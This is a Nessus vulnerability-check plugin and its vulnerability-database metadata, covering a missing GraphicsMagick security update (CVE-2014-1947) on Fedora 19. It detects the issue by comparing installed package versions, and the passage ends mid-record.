ID FEDORA_2014-9624.NASL Type nessus Reporter Tenable Modified 2018-12-05T00:00:00
Description
New stable upstream release, patched for CVE-2014-1947. See also:
http://www.graphicsmagick.org/NEWS.html#august-16-2014
Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2014-9624.
#
include("compat.inc");
if (description)
{
script_id(77678);
script_version("1.5");
script_cvs_date("Date: 2018/12/05 20:31:22");
script_cve_id("CVE-2014-1947");
script_bugtraq_id(65683);
script_xref(name:"FEDORA", value:"2014-9624");
script_name(english:"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"New stable upstream release, patched for CVE-2014-1947. See also:
http://www.graphicsmagick.org/NEWS.html#august-16-2014
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"http://www.graphicsmagick.org/NEWS.html#august-16-2014"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=1064098"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?cd013851"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected GraphicsMagick package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:GraphicsMagick");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:19");
script_set_attribute(attribute:"patch_publication_date", value:"2014/08/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/09/15");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^19([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 19.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC19", reference:"GraphicsMagick-1.3.20-3.fc19")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "GraphicsMagick");
}
{"id": "FEDORA_2014-9624.NASL", "bulletinFamily": "scanner", "title": "Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)", "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2014-09-15T00:00:00", "modified": "2018-12-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=77678", "reporter": "Tenable", "references": ["http://www.graphicsmagick.org/NEWS.html#august-16-2014", "https://bugzilla.redhat.com/show_bug.cgi?id=1064098", "http://www.nessus.org/u?cd013851"], "cvelist": ["CVE-2014-1947"], "type": "nessus", "lastseen": "2019-02-21T01:22:24", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:GraphicsMagick"], "cvelist": ["CVE-2014-1947"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "763240a880a90b040e72b515c99f558b28963e78562832cd02cc6235b8ede660", "hashmap": [{"hash": "a74da1f212f8bf92a2acb970ecba4db2", "key": "href"}, {"hash": "eb10e08fe1540f4f9f5e1265ef4130a4", "key": "cvelist"}, {"hash": "0781303a5610f358747f8fabaa6e72fc", "key": "cpe"}, {"hash": "ecf51dfa964f1eb29adbc629a2f37624", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5f736a8bbf14a007b3be35f86aeeac64", "key": "sourceData"}, {"hash": "a1fb36120e0e8d6655c4ecf449e374cc", "key": "description"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "8f7c0244c4439157edc29ca5cefd932a", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "92aac71407b860a9e44db4b8e2d91f8a", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4ef4a98ca2233167e1dea982a0983927", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=77678", "id": "FEDORA_2014-9624.NASL", "lastseen": "2017-10-29T13:40:55", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "77678", "published": "2014-09-15T00:00:00", "references": ["http://www.graphicsmagick.org/NEWS.html#august-16-2014", "https://bugzilla.redhat.com/show_bug.cgi?id=1064098", "http://www.nessus.org/u?cd013851"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9624.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77678);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:49:03 $\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9624\");\n\n script_name(english:\"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd013851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"GraphicsMagick-1.3.20-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "title": "Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:40:55"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:GraphicsMagick"], "cvelist": ["CVE-2014-1947"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "af526322a90b7e8bb5441fc52a59c9a0a6efa574ba4df0cd0909b0bf8a513a35", "hashmap": [{"hash": "a74da1f212f8bf92a2acb970ecba4db2", "key": "href"}, {"hash": "eb10e08fe1540f4f9f5e1265ef4130a4", "key": "cvelist"}, {"hash": "0781303a5610f358747f8fabaa6e72fc", "key": "cpe"}, {"hash": "ecf51dfa964f1eb29adbc629a2f37624", "key": "title"}, {"hash": "cdfdd3bde3a2886722003d7eda0e3101", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7fdc0f4fd092ba3e1ae60ca5347a5507", "key": "sourceData"}, {"hash": "a1fb36120e0e8d6655c4ecf449e374cc", "key": "description"}, {"hash": "8f7c0244c4439157edc29ca5cefd932a", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "92aac71407b860a9e44db4b8e2d91f8a", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4ef4a98ca2233167e1dea982a0983927", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=77678", "id": "FEDORA_2014-9624.NASL", "lastseen": "2018-12-08T03:48:45", "modified": "2018-12-05T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "77678", "published": "2014-09-15T00:00:00", "references": ["http://www.graphicsmagick.org/NEWS.html#august-16-2014", "https://bugzilla.redhat.com/show_bug.cgi?id=1064098", "http://www.nessus.org/u?cd013851"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9624.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77678);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9624\");\n\n script_name(english:\"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd013851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"GraphicsMagick-1.3.20-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "title": "Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-12-08T03:48:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:GraphicsMagick"], "cvelist": ["CVE-2014-1947"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:19:42", "references": [{"idList": ["EDB-ID:31688"], "type": "exploitdb"}, {"idList": ["GLSA-201405-09"], "type": "gentoo"}, {"idList": ["OPENVAS:1361412562310120182", "OPENVAS:1361412562310867698", "OPENVAS:867698", "OPENVAS:1361412562310702898", "OPENVAS:1361412562310868136", "OPENVAS:1361412562310868172", "OPENVAS:1361412562310868184", "OPENVAS:1361412562310121184", "OPENVAS:702898", "OPENVAS:1361412562310120052"], "type": "openvas"}, {"idList": ["DEBIAN_DSA-2898.NASL", "ALA_ALAS-2014-420.NASL", "FEDORA_2014-9596.NASL", "FEDORA_2014-14617.NASL", "ALA_ALAS-2014-336.NASL", "FEDORA_2014-9927.NASL", "SOLARIS11_IMAGEMAGICK_20140731.NASL", "SUSE_11_IMAGEMAGICK-140307.NASL", "FEDORA_2014-4969.NASL", "IMAGEMAGICK_6_8_7_6.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-21901"], "type": "zdt"}, {"idList": ["SSV:85003", "SSV:61456"], "type": "seebug"}, {"idList": ["ALAS-2014-420", "ALAS-2014-336"], "type": "amazon"}, {"idList": ["DEBIAN:DSA-2898-1:75ACF"], "type": "debian"}]}, "score": {"value": 2.1, "vector": "NONE"}}, "hash": "22c0baa16ea63454821fb7266ce919b531221cddc68c41d8a9933d3a82f5e90d", "hashmap": [{"hash": "a74da1f212f8bf92a2acb970ecba4db2", "key": "href"}, {"hash": "eb10e08fe1540f4f9f5e1265ef4130a4", "key": "cvelist"}, {"hash": "0781303a5610f358747f8fabaa6e72fc", "key": "cpe"}, {"hash": "ecf51dfa964f1eb29adbc629a2f37624", "key": "title"}, {"hash": "cdfdd3bde3a2886722003d7eda0e3101", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7fdc0f4fd092ba3e1ae60ca5347a5507", "key": "sourceData"}, {"hash": "8f7c0244c4439157edc29ca5cefd932a", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "92aac71407b860a9e44db4b8e2d91f8a", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4ef4a98ca2233167e1dea982a0983927", "key": "published"}, {"hash": "2aa16c62a124e7bf4caeec5838c01956", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=77678", "id": "FEDORA_2014-9624.NASL", "lastseen": "2019-01-16T20:19:42", "modified": "2018-12-05T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "77678", "published": "2014-09-15T00:00:00", "references": ["http://www.graphicsmagick.org/NEWS.html#august-16-2014", "https://bugzilla.redhat.com/show_bug.cgi?id=1064098", "http://www.nessus.org/u?cd013851"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9624.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77678);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9624\");\n\n script_name(english:\"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137653.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd013851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"GraphicsMagick-1.3.20-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "title": "Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:19:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-1947"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "13fed6cdcd93d7eddb9ad7e4a8fad70a57153cef06a6784a44739bb58a522db5", "hashmap": [{"hash": "a74da1f212f8bf92a2acb970ecba4db2", "key": "href"}, {"hash": "eb10e08fe1540f4f9f5e1265ef4130a4", "key": "cvelist"}, {"hash": "ecf51dfa964f1eb29adbc629a2f37624", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5f736a8bbf14a007b3be35f86aeeac64", "key": "sourceData"}, {"hash": "a1fb36120e0e8d6655c4ecf449e374cc", "key": "description"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "8f7c0244c4439157edc29ca5cefd932a", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "92aac71407b860a9e44db4b8e2d91f8a", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4ef4a98ca2233167e1dea982a0983927", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=77678", "id": "FEDORA_2014-9624.NASL", "lastseen": "2016-09-26T17:25:23", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "77678", "published": "2014-09-15T00:00:00", "references": ["http://www.graphicsmagick.org/NEWS.html#august-16-2014", "https://bugzilla.redhat.com/show_bug.cgi?id=1064098", "http://www.nessus.org/u?cd013851"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9624.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77678);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:49:03 $\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9624\");\n\n script_name(english:\"Fedora 19 : GraphicsMagick-1.3.20-3.fc19 (2014-9624)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n 